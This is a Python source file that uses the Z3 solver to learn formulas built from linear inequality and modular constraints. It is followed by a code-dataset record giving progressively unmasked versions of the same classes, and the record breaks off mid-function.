def formula_model(self, *val): # 得到一个公式模型 kd:代入变量求得变量,代入数值就是求得一个值
if len(val) == 0:
val = self.vi
formu = []
for k in range(self.k):
clause = []
for h in range(self.h):
Coe = combine(self.A[h][j] * val[j] for j in range(self.n))
status = (self.He[k][h], self.Hge[k][h], self.Hle[k][h])
if status == (False, False, True): #选择大于小于等于
clause.append(Coe <= self.B[h])
elif status == (False, True, False):
clause.append(Coe >= self.B[h])
elif status == (True, False, False):
clause.append(Coe != self.B[h])
elif status == (False, True, True):
clause.append(Coe == self.B[h])
elif status == (True, False, True):
clause.append(Coe < self.B[h])
elif status == (True, True, False):
clause.append(Coe > self.B[h])
elif status == (True, True, True):
clause.append(False)
for m in range(self.m):
status = (self.T[k][m], self.Nt[k][m])
if status == (True, False): #选择取模
clause.append(combine(self.M[m][j] * val[j] for j in range(self.n)) % self.E[m] == self.C[m])
elif status == (False, True):
clause.append(combine(self.M[m][j] * val[j] for j in range(self.n)) % self.E[m] != self.C[m])
elif status == (True, True):
clause.append(False)
formu.append(And(*clause))
# print("simplify(Or(*formu))=\n",simplify(Or(*formu)))
return simplify(Or(*formu))
def refine_modu(self, coe, e, b, res, tmp, last=0):
if len(coe) == 1:
if coe[0] == 0:
if last % e == b:
tmp.append(0)
else:
return
for i in range(e):
if (i + last) % e == b:
tmp.append(i)
break
res.append(list(tmp))
tmp.pop()
elif coe[0] == 0:
tmp.append(0)
self.refine_modu(coe[1:], e, b, res, tmp, last)
tmp.pop()
else:
for i in range(e):
tmp.append(i)
self.refine_modu(coe[1:], e, b, res, tmp, last + i)
tmp.pop()
def build_formula(self, coe, V, e, C):
expr = And(*[(coe[i] * v) % e == C[i] for i, v in enumerate(V)])
return simplify(expr)
def refine_model(self):
formu_arr = []
for k in range(self.k):
clause = []
for h in range(self.h):
Coe = combine(self.A[h][j] * self.vi[j] for j in range(self.n))
status = (self.He[k][h], self.Hge[k][h], self.Hle[k][h])
if status == (False, False, True):
clause.append([Coe < self.B[h], Coe == self.B[h]])
elif status == (False, True, False):
clause.append([Coe > self.B[h], Coe == self.B[h]])
elif status == (True, False, False):
clause.append([Coe < self.B[h], Coe > self.B[h]])
elif status == (False, True, True):
clause.append([Coe == self.B[h]])
elif status == (True, False, True):
clause.append([Coe < self.B[h]])
elif status == (True, True, False):
clause.append([Coe > self.B[h]])
elif status == (True, True, True):
clause.append([False])
for m in range(self.m):
status = (self.T[k][m], self.Nt[k][m])
# Com = combine(self.M[m][j] * self.vi[j] for j in range(self.n))
if status == (True, False):
# clause.append([Com % self.E[m] == self.C[m]])
mod_res = []
self.refine_modu(self.M[m], self.E[m], self.C[m], mod_res, [])
for C in mod_res:
clause.append([self.build_formula(self.M[m], self.vi, self.E[m], C)])
elif status == (False, True):
mod_clause = []
for i in range(self.E[m]):
if i != self.C[m]:
# mod_clause.append(Com % self.E[m] == i)
mod_res = []
self.refine_modu(self.M[m], self.E[m], i, mod_res, [])
for C in mod_res:
mod_clause.append(self.build_formula(self.M[m], self.vi, self.E[m], C))
clause.append(mod_clause)
elif status == (True, True):
clause.append([False])
formu_arr.append(clause)
return formu_arr
class EquTemplate:
def __init__(self, n):
self.vi = [Int('v' + str(i)) for i in range(n)]
self.b = Int('b')
self.s = Solver()
def add(self, vector):
vi, target = vector[:-1], vector[-1]
expr = combine(vi[i] * self.vi[i] for i in range(len(self.vi))) + self.b == target
self.s.add(expr)
def check(self):
return self.s.check()
def solve_model(self):
model = self.s.model()
V = [model[v].as_long() if model[v] is not None else 0 for v in self.vi]
B = model[self.b].as_long() if model[self.b] is not None else 0
expr = combine(V[i] * self.vi[i] for i in range(len(self.vi))) + B
return simplify(expr)
if __name__ == '__main__':
# smt = FormulaTemplate([Int('v1'), Int('v2')], 4, 3, 2)
# smt.add([1, 2], True)
# smt.add([2, 3], False)
# print(smt.s)
# print(smt.check())
#
# arr = smt.refine_model()
# for a in arr:
# print(a)
#
# formu = smt.formula_model()
# print(formu)
# print('-' * 50)
# print(simplify(formu))
# print('-' * 50)
smt = EquTemplate(2)
smt.add([0, 1, 1])
smt.add([1, 2, 1])
smt.add([3, 6, 3])
if smt.check() == sat:
print(smt.solve_model()) # 1*v0 + 2*v1 + 1
else:
print(unsat)
|
normal
|
{
"blob_id": "81fce5314a7611de11648e412151112e29271871",
"index": 4626,
"step-1": "<mask token>\n\n\nclass FormulaTemplate:\n\n def __init__(self, vi, w, k, h, m, timeout=3000000):\n self.k = k\n self.h = h\n self.m = m\n self.w = w\n self.vi = vi\n n = len(vi)\n self.n = n\n self.aeij = [[Int('ae' + str(i) + str(j)) for j in range(n)] for i in\n range(h)]\n self.bi = [Int('b' + str(i)) for i in range(h)]\n self.amij = [[Int('am' + str(i) + str(j)) for j in range(n)] for i in\n range(m)]\n self.ei = [Int('e' + str(i)) for i in range(m)]\n self.ci = [Int('c' + str(i)) for i in range(m)]\n self.heij = [[Bool('h_e' + str(j) + str(i)) for i in range(h)] for\n j in range(k)]\n self.hgeij = [[Bool('h_ge' + str(j) + str(i)) for i in range(h)] for\n j in range(k)]\n self.hleij = [[Bool('h_le' + str(j) + str(i)) for i in range(h)] for\n j in range(k)]\n self.tij = [[Bool('t' + str(j) + str(i)) for i in range(m)] for j in\n range(k)]\n self.ntij = [[Bool('nt' + str(j) + str(i)) for i in range(m)] for j in\n range(k)]\n self.s = Solver()\n for i in range(h):\n self.s.add(Or(*[(a > 0) for a in self.aeij[i]]))\n for j in range(i + 1, h):\n self.s.add(Or(*[(self.aeij[i][w] != self.aeij[j][w]) for w in\n range(n)]))\n for i in range(m):\n self.s.add(Or(*[(am > 0) for am in self.amij[i]]))\n self.s.add(*[And(0 <= am, am < self.ei[i]) for am in self.amij[i]])\n self.s.add(*[And(self.ei[i] > self.ci[i], self.ci[i] >= 0) for i in\n range(m)])\n self.s.add(*[And(e <= 10 * m, e >= 2) for e in self.ei])\n for i in range(k):\n for j in range(i + 1, k):\n all_true = [And(self.heij[i][w], self.hgeij[i][w], self.\n hleij[i][w]) for w in range(h)]\n all_true.extend([And(self.tij[i][w], self.ntij[i][w]) for w in\n range(m)])\n struct_const = [Or(self.heij[i][w] != self.heij[j][w], self\n .hgeij[i][w] != self.hgeij[j][w], self.hleij[i][w] !=\n self.hleij[j][w]) for w in range(h)]\n struct_const.extend([Or(self.tij[i][w] != self.tij[j][w], \n self.ntij[i][w] != self.ntij[j][w]) for w in range(m)])\n self.s.add(Or(*struct_const, *all_true))\n self.s.set('timeout', timeout)\n <mask token>\n <mask token>\n\n def W_size(m):\n return m + 2\n <mask token>\n <mask token>\n\n def formula_model(self, *val):\n if len(val) == 0:\n val = self.vi\n formu = []\n for k in range(self.k):\n clause = []\n for h in range(self.h):\n Coe = combine(self.A[h][j] * val[j] for j in range(self.n))\n status = self.He[k][h], self.Hge[k][h], self.Hle[k][h]\n if status == (False, False, True):\n clause.append(Coe <= self.B[h])\n elif status == (False, True, False):\n clause.append(Coe >= self.B[h])\n elif status == (True, False, False):\n clause.append(Coe != self.B[h])\n elif status == (False, True, True):\n clause.append(Coe == self.B[h])\n elif status == (True, False, True):\n clause.append(Coe < self.B[h])\n elif status == (True, True, False):\n clause.append(Coe > self.B[h])\n elif status == (True, True, True):\n clause.append(False)\n for m in range(self.m):\n status = self.T[k][m], self.Nt[k][m]\n if status == (True, False):\n clause.append(combine(self.M[m][j] * val[j] for j in\n range(self.n)) % self.E[m] == self.C[m])\n elif status == (False, True):\n clause.append(combine(self.M[m][j] * val[j] for j in\n range(self.n)) % self.E[m] != self.C[m])\n elif status == (True, True):\n clause.append(False)\n formu.append(And(*clause))\n return simplify(Or(*formu))\n\n def refine_modu(self, coe, e, b, res, tmp, last=0):\n if len(coe) == 1:\n if coe[0] == 0:\n if last % e == b:\n tmp.append(0)\n else:\n return\n for i in range(e):\n if (i + last) % e == b:\n tmp.append(i)\n break\n res.append(list(tmp))\n tmp.pop()\n elif coe[0] == 0:\n tmp.append(0)\n self.refine_modu(coe[1:], e, b, res, tmp, last)\n tmp.pop()\n else:\n for i in range(e):\n tmp.append(i)\n self.refine_modu(coe[1:], e, b, res, tmp, last + i)\n tmp.pop()\n\n def build_formula(self, coe, V, e, C):\n expr = And(*[(coe[i] * v % e == C[i]) for i, v in enumerate(V)])\n return simplify(expr)\n <mask token>\n\n\nclass EquTemplate:\n\n def __init__(self, n):\n self.vi = [Int('v' + str(i)) for i in range(n)]\n self.b = Int('b')\n self.s = Solver()\n\n def add(self, vector):\n vi, target = vector[:-1], vector[-1]\n expr = combine(vi[i] * self.vi[i] for i in range(len(self.vi))\n ) + self.b == target\n self.s.add(expr)\n\n def check(self):\n return self.s.check()\n\n def solve_model(self):\n model = self.s.model()\n V = [(model[v].as_long() if model[v] is not None else 0) for v in\n self.vi]\n B = model[self.b].as_long() if model[self.b] is not None else 0\n expr = combine(V[i] * self.vi[i] for i in range(len(self.vi))) + B\n return simplify(expr)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass FormulaTemplate:\n\n def __init__(self, vi, w, k, h, m, timeout=3000000):\n self.k = k\n self.h = h\n self.m = m\n self.w = w\n self.vi = vi\n n = len(vi)\n self.n = n\n self.aeij = [[Int('ae' + str(i) + str(j)) for j in range(n)] for i in\n range(h)]\n self.bi = [Int('b' + str(i)) for i in range(h)]\n self.amij = [[Int('am' + str(i) + str(j)) for j in range(n)] for i in\n range(m)]\n self.ei = [Int('e' + str(i)) for i in range(m)]\n self.ci = [Int('c' + str(i)) for i in range(m)]\n self.heij = [[Bool('h_e' + str(j) + str(i)) for i in range(h)] for\n j in range(k)]\n self.hgeij = [[Bool('h_ge' + str(j) + str(i)) for i in range(h)] for\n j in range(k)]\n self.hleij = [[Bool('h_le' + str(j) + str(i)) for i in range(h)] for\n j in range(k)]\n self.tij = [[Bool('t' + str(j) + str(i)) for i in range(m)] for j in\n range(k)]\n self.ntij = [[Bool('nt' + str(j) + str(i)) for i in range(m)] for j in\n range(k)]\n self.s = Solver()\n for i in range(h):\n self.s.add(Or(*[(a > 0) for a in self.aeij[i]]))\n for j in range(i + 1, h):\n self.s.add(Or(*[(self.aeij[i][w] != self.aeij[j][w]) for w in\n range(n)]))\n for i in range(m):\n self.s.add(Or(*[(am > 0) for am in self.amij[i]]))\n self.s.add(*[And(0 <= am, am < self.ei[i]) for am in self.amij[i]])\n self.s.add(*[And(self.ei[i] > self.ci[i], self.ci[i] >= 0) for i in\n range(m)])\n self.s.add(*[And(e <= 10 * m, e >= 2) for e in self.ei])\n for i in range(k):\n for j in range(i + 1, k):\n all_true = [And(self.heij[i][w], self.hgeij[i][w], self.\n hleij[i][w]) for w in range(h)]\n all_true.extend([And(self.tij[i][w], self.ntij[i][w]) for w in\n range(m)])\n struct_const = [Or(self.heij[i][w] != self.heij[j][w], self\n .hgeij[i][w] != self.hgeij[j][w], self.hleij[i][w] !=\n self.hleij[j][w]) for w in range(h)]\n struct_const.extend([Or(self.tij[i][w] != self.tij[j][w], \n self.ntij[i][w] != self.ntij[j][w]) for w in range(m)])\n self.s.add(Or(*struct_const, *all_true))\n self.s.set('timeout', timeout)\n\n def add(self, example, label):\n self.s.add(self.encoding(example, label))\n\n def check(self):\n check = self.s.check()\n if check == sat:\n self.solve_model()\n return check\n\n def W_size(m):\n return m + 2\n <mask token>\n <mask token>\n\n def formula_model(self, *val):\n if len(val) == 0:\n val = self.vi\n formu = []\n for k in range(self.k):\n clause = []\n for h in range(self.h):\n Coe = combine(self.A[h][j] * val[j] for j in range(self.n))\n status = self.He[k][h], self.Hge[k][h], self.Hle[k][h]\n if status == (False, False, True):\n clause.append(Coe <= self.B[h])\n elif status == (False, True, False):\n clause.append(Coe >= self.B[h])\n elif status == (True, False, False):\n clause.append(Coe != self.B[h])\n elif status == (False, True, True):\n clause.append(Coe == self.B[h])\n elif status == (True, False, True):\n clause.append(Coe < self.B[h])\n elif status == (True, True, False):\n clause.append(Coe > self.B[h])\n elif status == (True, True, True):\n clause.append(False)\n for m in range(self.m):\n status = self.T[k][m], self.Nt[k][m]\n if status == (True, False):\n clause.append(combine(self.M[m][j] * val[j] for j in\n range(self.n)) % self.E[m] == self.C[m])\n elif status == (False, True):\n clause.append(combine(self.M[m][j] * val[j] for j in\n range(self.n)) % self.E[m] != self.C[m])\n elif status == (True, True):\n clause.append(False)\n formu.append(And(*clause))\n return simplify(Or(*formu))\n\n def refine_modu(self, coe, e, b, res, tmp, last=0):\n if len(coe) == 1:\n if coe[0] == 0:\n if last % e == b:\n tmp.append(0)\n else:\n return\n for i in range(e):\n if (i + last) % e == b:\n tmp.append(i)\n break\n res.append(list(tmp))\n tmp.pop()\n elif coe[0] == 0:\n tmp.append(0)\n self.refine_modu(coe[1:], e, b, res, tmp, last)\n tmp.pop()\n else:\n for i in range(e):\n tmp.append(i)\n self.refine_modu(coe[1:], e, b, res, tmp, last + i)\n tmp.pop()\n\n def build_formula(self, coe, V, e, C):\n expr = And(*[(coe[i] * v % e == C[i]) for i, v in enumerate(V)])\n return simplify(expr)\n\n def refine_model(self):\n formu_arr = []\n for k in range(self.k):\n clause = []\n for h in range(self.h):\n Coe = combine(self.A[h][j] * self.vi[j] for j in range(self.n))\n status = self.He[k][h], self.Hge[k][h], self.Hle[k][h]\n if status == (False, False, True):\n clause.append([Coe < self.B[h], Coe == self.B[h]])\n elif status == (False, True, False):\n clause.append([Coe > self.B[h], Coe == self.B[h]])\n elif status == (True, False, False):\n clause.append([Coe < self.B[h], Coe > self.B[h]])\n elif status == (False, True, True):\n clause.append([Coe == self.B[h]])\n elif status == (True, False, True):\n clause.append([Coe < self.B[h]])\n elif status == (True, True, False):\n clause.append([Coe > self.B[h]])\n elif status == (True, True, True):\n clause.append([False])\n for m in range(self.m):\n status = self.T[k][m], self.Nt[k][m]\n if status == (True, False):\n mod_res = []\n self.refine_modu(self.M[m], self.E[m], self.C[m],\n mod_res, [])\n for C in mod_res:\n clause.append([self.build_formula(self.M[m], self.\n vi, self.E[m], C)])\n elif status == (False, True):\n mod_clause = []\n for i in range(self.E[m]):\n if i != self.C[m]:\n mod_res = []\n self.refine_modu(self.M[m], self.E[m], i,\n mod_res, [])\n for C in mod_res:\n mod_clause.append(self.build_formula(self.M\n [m], self.vi, self.E[m], C))\n clause.append(mod_clause)\n elif status == (True, True):\n clause.append([False])\n formu_arr.append(clause)\n return formu_arr\n\n\nclass EquTemplate:\n\n def __init__(self, n):\n self.vi = [Int('v' + str(i)) for i in range(n)]\n self.b = Int('b')\n self.s = Solver()\n\n def add(self, vector):\n vi, target = vector[:-1], vector[-1]\n expr = combine(vi[i] * self.vi[i] for i in range(len(self.vi))\n ) + self.b == target\n self.s.add(expr)\n\n def check(self):\n return self.s.check()\n\n def solve_model(self):\n model = self.s.model()\n V = [(model[v].as_long() if model[v] is not None else 0) for v in\n self.vi]\n B = model[self.b].as_long() if model[self.b] is not None else 0\n expr = combine(V[i] * self.vi[i] for i in range(len(self.vi))) + B\n return simplify(expr)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass FormulaTemplate:\n\n def __init__(self, vi, w, k, h, m, timeout=3000000):\n self.k = k\n self.h = h\n self.m = m\n self.w = w\n self.vi = vi\n n = len(vi)\n self.n = n\n self.aeij = [[Int('ae' + str(i) + str(j)) for j in range(n)] for i in\n range(h)]\n self.bi = [Int('b' + str(i)) for i in range(h)]\n self.amij = [[Int('am' + str(i) + str(j)) for j in range(n)] for i in\n range(m)]\n self.ei = [Int('e' + str(i)) for i in range(m)]\n self.ci = [Int('c' + str(i)) for i in range(m)]\n self.heij = [[Bool('h_e' + str(j) + str(i)) for i in range(h)] for\n j in range(k)]\n self.hgeij = [[Bool('h_ge' + str(j) + str(i)) for i in range(h)] for\n j in range(k)]\n self.hleij = [[Bool('h_le' + str(j) + str(i)) for i in range(h)] for\n j in range(k)]\n self.tij = [[Bool('t' + str(j) + str(i)) for i in range(m)] for j in\n range(k)]\n self.ntij = [[Bool('nt' + str(j) + str(i)) for i in range(m)] for j in\n range(k)]\n self.s = Solver()\n for i in range(h):\n self.s.add(Or(*[(a > 0) for a in self.aeij[i]]))\n for j in range(i + 1, h):\n self.s.add(Or(*[(self.aeij[i][w] != self.aeij[j][w]) for w in\n range(n)]))\n for i in range(m):\n self.s.add(Or(*[(am > 0) for am in self.amij[i]]))\n self.s.add(*[And(0 <= am, am < self.ei[i]) for am in self.amij[i]])\n self.s.add(*[And(self.ei[i] > self.ci[i], self.ci[i] >= 0) for i in\n range(m)])\n self.s.add(*[And(e <= 10 * m, e >= 2) for e in self.ei])\n for i in range(k):\n for j in range(i + 1, k):\n all_true = [And(self.heij[i][w], self.hgeij[i][w], self.\n hleij[i][w]) for w in range(h)]\n all_true.extend([And(self.tij[i][w], self.ntij[i][w]) for w in\n range(m)])\n struct_const = [Or(self.heij[i][w] != self.heij[j][w], self\n .hgeij[i][w] != self.hgeij[j][w], self.hleij[i][w] !=\n self.hleij[j][w]) for w in range(h)]\n struct_const.extend([Or(self.tij[i][w] != self.tij[j][w], \n self.ntij[i][w] != self.ntij[j][w]) for w in range(m)])\n self.s.add(Or(*struct_const, *all_true))\n self.s.set('timeout', timeout)\n\n def add(self, example, label):\n self.s.add(self.encoding(example, label))\n\n def check(self):\n check = self.s.check()\n if check == sat:\n self.solve_model()\n return check\n\n def W_size(m):\n return m + 2\n\n def encoding(self, example, label):\n Equ = [(combine(example[j] * self.aeij[i][j] for j in range(self.n)\n ) != self.bi[i]) for i in range(self.h)]\n Ge = [(combine(example[j] * self.aeij[i][j] for j in range(self.n)) >=\n self.bi[i]) for i in range(self.h)]\n Le = [(combine(example[j] * self.aeij[i][j] for j in range(self.n)) <=\n self.bi[i]) for i in range(self.h)]\n Me = [(combine(example[j] * self.amij[i][j] for j in range(self.n)) %\n self.ei[i] == self.ci[i]) for i in range(self.m)]\n Tk = []\n for k in range(self.k):\n clause = []\n clause.extend([Implies(self.heij[k][h], Equ[h]) for h in range(\n self.h)])\n clause.extend([Implies(self.hgeij[k][h], Ge[h]) for h in range(\n self.h)])\n clause.extend([Implies(self.hleij[k][h], Le[h]) for h in range(\n self.h)])\n clause.extend([Implies(self.tij[k][m], Me[m]) for m in range(\n self.m)])\n clause.extend([Implies(self.ntij[k][m], Not(Me[m])) for m in\n range(self.m)])\n Tk.append(And(*clause))\n return Or(*Tk) == label\n <mask token>\n\n def formula_model(self, *val):\n if len(val) == 0:\n val = self.vi\n formu = []\n for k in range(self.k):\n clause = []\n for h in range(self.h):\n Coe = combine(self.A[h][j] * val[j] for j in range(self.n))\n status = self.He[k][h], self.Hge[k][h], self.Hle[k][h]\n if status == (False, False, True):\n clause.append(Coe <= self.B[h])\n elif status == (False, True, False):\n clause.append(Coe >= self.B[h])\n elif status == (True, False, False):\n clause.append(Coe != self.B[h])\n elif status == (False, True, True):\n clause.append(Coe == self.B[h])\n elif status == (True, False, True):\n clause.append(Coe < self.B[h])\n elif status == (True, True, False):\n clause.append(Coe > self.B[h])\n elif status == (True, True, True):\n clause.append(False)\n for m in range(self.m):\n status = self.T[k][m], self.Nt[k][m]\n if status == (True, False):\n clause.append(combine(self.M[m][j] * val[j] for j in\n range(self.n)) % self.E[m] == self.C[m])\n elif status == (False, True):\n clause.append(combine(self.M[m][j] * val[j] for j in\n range(self.n)) % self.E[m] != self.C[m])\n elif status == (True, True):\n clause.append(False)\n formu.append(And(*clause))\n return simplify(Or(*formu))\n\n def refine_modu(self, coe, e, b, res, tmp, last=0):\n if len(coe) == 1:\n if coe[0] == 0:\n if last % e == b:\n tmp.append(0)\n else:\n return\n for i in range(e):\n if (i + last) % e == b:\n tmp.append(i)\n break\n res.append(list(tmp))\n tmp.pop()\n elif coe[0] == 0:\n tmp.append(0)\n self.refine_modu(coe[1:], e, b, res, tmp, last)\n tmp.pop()\n else:\n for i in range(e):\n tmp.append(i)\n self.refine_modu(coe[1:], e, b, res, tmp, last + i)\n tmp.pop()\n\n def build_formula(self, coe, V, e, C):\n expr = And(*[(coe[i] * v % e == C[i]) for i, v in enumerate(V)])\n return simplify(expr)\n\n def refine_model(self):\n formu_arr = []\n for k in range(self.k):\n clause = []\n for h in range(self.h):\n Coe = combine(self.A[h][j] * self.vi[j] for j in range(self.n))\n status = self.He[k][h], self.Hge[k][h], self.Hle[k][h]\n if status == (False, False, True):\n clause.append([Coe < self.B[h], Coe == self.B[h]])\n elif status == (False, True, False):\n clause.append([Coe > self.B[h], Coe == self.B[h]])\n elif status == (True, False, False):\n clause.append([Coe < self.B[h], Coe > self.B[h]])\n elif status == (False, True, True):\n clause.append([Coe == self.B[h]])\n elif status == (True, False, True):\n clause.append([Coe < self.B[h]])\n elif status == (True, True, False):\n clause.append([Coe > self.B[h]])\n elif status == (True, True, True):\n clause.append([False])\n for m in range(self.m):\n status = self.T[k][m], self.Nt[k][m]\n if status == (True, False):\n mod_res = []\n self.refine_modu(self.M[m], self.E[m], self.C[m],\n mod_res, [])\n for C in mod_res:\n clause.append([self.build_formula(self.M[m], self.\n vi, self.E[m], C)])\n elif status == (False, True):\n mod_clause = []\n for i in range(self.E[m]):\n if i != self.C[m]:\n mod_res = []\n self.refine_modu(self.M[m], self.E[m], i,\n mod_res, [])\n for C in mod_res:\n mod_clause.append(self.build_formula(self.M\n [m], self.vi, self.E[m], C))\n clause.append(mod_clause)\n elif status == (True, True):\n clause.append([False])\n formu_arr.append(clause)\n return formu_arr\n\n\nclass EquTemplate:\n\n def __init__(self, n):\n self.vi = [Int('v' + str(i)) for i in range(n)]\n self.b = Int('b')\n self.s = Solver()\n\n def add(self, vector):\n vi, target = vector[:-1], vector[-1]\n expr = combine(vi[i] * self.vi[i] for i in range(len(self.vi))\n ) + self.b == target\n self.s.add(expr)\n\n def check(self):\n return self.s.check()\n\n def solve_model(self):\n model = self.s.model()\n V = [(model[v].as_long() if model[v] is not None else 0) for v in\n self.vi]\n B = model[self.b].as_long() if model[self.b] is not None else 0\n expr = combine(V[i] * self.vi[i] for i in range(len(self.vi))) + B\n return simplify(expr)\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass FormulaTemplate:\n\n def __init__(self, vi, w, k, h, m, timeout=3000000):\n self.k = k\n self.h = h\n self.m = m\n self.w = w\n self.vi = vi\n n = len(vi)\n self.n = n\n self.aeij = [[Int('ae' + str(i) + str(j)) for j in range(n)] for i in\n range(h)]\n self.bi = [Int('b' + str(i)) for i in range(h)]\n self.amij = [[Int('am' + str(i) + str(j)) for j in range(n)] for i in\n range(m)]\n self.ei = [Int('e' + str(i)) for i in range(m)]\n self.ci = [Int('c' + str(i)) for i in range(m)]\n self.heij = [[Bool('h_e' + str(j) + str(i)) for i in range(h)] for\n j in range(k)]\n self.hgeij = [[Bool('h_ge' + str(j) + str(i)) for i in range(h)] for\n j in range(k)]\n self.hleij = [[Bool('h_le' + str(j) + str(i)) for i in range(h)] for\n j in range(k)]\n self.tij = [[Bool('t' + str(j) + str(i)) for i in range(m)] for j in\n range(k)]\n self.ntij = [[Bool('nt' + str(j) + str(i)) for i in range(m)] for j in\n range(k)]\n self.s = Solver()\n for i in range(h):\n self.s.add(Or(*[(a > 0) for a in self.aeij[i]]))\n for j in range(i + 1, h):\n self.s.add(Or(*[(self.aeij[i][w] != self.aeij[j][w]) for w in\n range(n)]))\n for i in range(m):\n self.s.add(Or(*[(am > 0) for am in self.amij[i]]))\n self.s.add(*[And(0 <= am, am < self.ei[i]) for am in self.amij[i]])\n self.s.add(*[And(self.ei[i] > self.ci[i], self.ci[i] >= 0) for i in\n range(m)])\n self.s.add(*[And(e <= 10 * m, e >= 2) for e in self.ei])\n for i in range(k):\n for j in range(i + 1, k):\n all_true = [And(self.heij[i][w], self.hgeij[i][w], self.\n hleij[i][w]) for w in range(h)]\n all_true.extend([And(self.tij[i][w], self.ntij[i][w]) for w in\n range(m)])\n struct_const = [Or(self.heij[i][w] != self.heij[j][w], self\n .hgeij[i][w] != self.hgeij[j][w], self.hleij[i][w] !=\n self.hleij[j][w]) for w in range(h)]\n struct_const.extend([Or(self.tij[i][w] != self.tij[j][w], \n self.ntij[i][w] != self.ntij[j][w]) for w in range(m)])\n self.s.add(Or(*struct_const, *all_true))\n self.s.set('timeout', timeout)\n\n def add(self, example, label):\n self.s.add(self.encoding(example, label))\n\n def check(self):\n check = self.s.check()\n if check == sat:\n self.solve_model()\n return check\n\n def W_size(m):\n return m + 2\n\n def encoding(self, example, label):\n Equ = [(combine(example[j] * self.aeij[i][j] for j in range(self.n)\n ) != self.bi[i]) for i in range(self.h)]\n Ge = [(combine(example[j] * self.aeij[i][j] for j in range(self.n)) >=\n self.bi[i]) for i in range(self.h)]\n Le = [(combine(example[j] * self.aeij[i][j] for j in range(self.n)) <=\n self.bi[i]) for i in range(self.h)]\n Me = [(combine(example[j] * self.amij[i][j] for j in range(self.n)) %\n self.ei[i] == self.ci[i]) for i in range(self.m)]\n Tk = []\n for k in range(self.k):\n clause = []\n clause.extend([Implies(self.heij[k][h], Equ[h]) for h in range(\n self.h)])\n clause.extend([Implies(self.hgeij[k][h], Ge[h]) for h in range(\n self.h)])\n clause.extend([Implies(self.hleij[k][h], Le[h]) for h in range(\n self.h)])\n clause.extend([Implies(self.tij[k][m], Me[m]) for m in range(\n self.m)])\n clause.extend([Implies(self.ntij[k][m], Not(Me[m])) for m in\n range(self.m)])\n Tk.append(And(*clause))\n return Or(*Tk) == label\n\n def solve_model(self):\n print('w', self.w)\n model = self.s.model()\n self.M = [[(model[self.amij[i][j]].as_long() if model[self.amij[i][\n j]] is not None else 0) for j in range(self.n)] for i in range(\n self.m)]\n for i in range(self.m):\n self.ei[i] = FormulaTemplate.W_size(self.w)\n self.E = [self.ei[i] for i in range(self.m)]\n print('E = \\n', self.E)\n self.C = [(model[self.ci[i]].as_long() if model[self.ci[i]] is not\n None else 0) for i in range(self.m)]\n self.A = [[(model[self.aeij[i][j]].as_long() if model[self.aeij[i][\n j]] is not None else 0) for j in range(self.n)] for i in range(\n self.h)]\n self.B = [(model[self.bi[i]].as_long() if model[self.bi[i]] is not\n None else 0) for i in range(self.h)]\n self.He = [[(bool(model[self.heij[i][j]]) if model[self.heij[i][j]]\n is not None else False) for j in range(self.h)] for i in range\n (self.k)]\n self.Hge = [[(bool(model[self.hgeij[i][j]]) if model[self.hgeij[i][\n j]] is not None else False) for j in range(self.h)] for i in\n range(self.k)]\n self.Hle = [[(bool(model[self.hleij[i][j]]) if model[self.hleij[i][\n j]] is not None else False) for j in range(self.h)] for i in\n range(self.k)]\n self.T = [[(bool(model[self.tij[i][j]]) if model[self.tij[i][j]] is not\n None else False) for j in range(self.m)] for i in range(self.k)]\n self.Nt = [[(bool(model[self.ntij[i][j]]) if model[self.ntij[i][j]]\n is not None else False) for j in range(self.m)] for i in range\n (self.k)]\n for i in range(self.m):\n flag = True\n pix = -1\n for am in self.M[i]:\n if pix == -1:\n if am != 0:\n pix = am\n elif am != 0 and am != pix:\n flag = False\n break\n if flag:\n if self.C[i] == 0:\n if not co_prime(pix, self.E[i]):\n self.E[i] /= gcd(pix, self.E[i])\n for j in range(self.n):\n self.M[i][j] = 1\n else:\n div = gcd(pix, self.E[i], self.C[i])\n self.E[i] /= div\n self.C[i] /= div\n pix /= div\n for j in range(self.n):\n self.M[i][j] /= div\n div = gcd(int(pix), int(self.C[i]))\n for j in range(self.n):\n self.M[i][j] /= div\n self.C[i] /= div\n for i in range(self.h):\n divisior = gcd(*self.A[i], self.B[i])\n self.B[i] /= divisior\n for j in range(self.n):\n self.A[i][j] /= divisior\n for i in range(len(self.E)):\n self.E[i] = int(self.E[i])\n\n def formula_model(self, *val):\n if len(val) == 0:\n val = self.vi\n formu = []\n for k in range(self.k):\n clause = []\n for h in range(self.h):\n Coe = combine(self.A[h][j] * val[j] for j in range(self.n))\n status = self.He[k][h], self.Hge[k][h], self.Hle[k][h]\n if status == (False, False, True):\n clause.append(Coe <= self.B[h])\n elif status == (False, True, False):\n clause.append(Coe >= self.B[h])\n elif status == (True, False, False):\n clause.append(Coe != self.B[h])\n elif status == (False, True, True):\n clause.append(Coe == self.B[h])\n elif status == (True, False, True):\n clause.append(Coe < self.B[h])\n elif status == (True, True, False):\n clause.append(Coe > self.B[h])\n elif status == (True, True, True):\n clause.append(False)\n for m in range(self.m):\n status = self.T[k][m], self.Nt[k][m]\n if status == (True, False):\n clause.append(combine(self.M[m][j] * val[j] for j in\n range(self.n)) % self.E[m] == self.C[m])\n elif status == (False, True):\n clause.append(combine(self.M[m][j] * val[j] for j in\n range(self.n)) % self.E[m] != self.C[m])\n elif status == (True, True):\n clause.append(False)\n formu.append(And(*clause))\n return simplify(Or(*formu))\n\n def refine_modu(self, coe, e, b, res, tmp, last=0):\n if len(coe) == 1:\n if coe[0] == 0:\n if last % e == b:\n tmp.append(0)\n else:\n return\n for i in range(e):\n if (i + last) % e == b:\n tmp.append(i)\n break\n res.append(list(tmp))\n tmp.pop()\n elif coe[0] == 0:\n tmp.append(0)\n self.refine_modu(coe[1:], e, b, res, tmp, last)\n tmp.pop()\n else:\n for i in range(e):\n tmp.append(i)\n self.refine_modu(coe[1:], e, b, res, tmp, last + i)\n tmp.pop()\n\n def build_formula(self, coe, V, e, C):\n expr = And(*[(coe[i] * v % e == C[i]) for i, v in enumerate(V)])\n return simplify(expr)\n\n def refine_model(self):\n formu_arr = []\n for k in range(self.k):\n clause = []\n for h in range(self.h):\n Coe = combine(self.A[h][j] * self.vi[j] for j in range(self.n))\n status = self.He[k][h], self.Hge[k][h], self.Hle[k][h]\n if status == (False, False, True):\n clause.append([Coe < self.B[h], Coe == self.B[h]])\n elif status == (False, True, False):\n clause.append([Coe > self.B[h], Coe == self.B[h]])\n elif status == (True, False, False):\n clause.append([Coe < 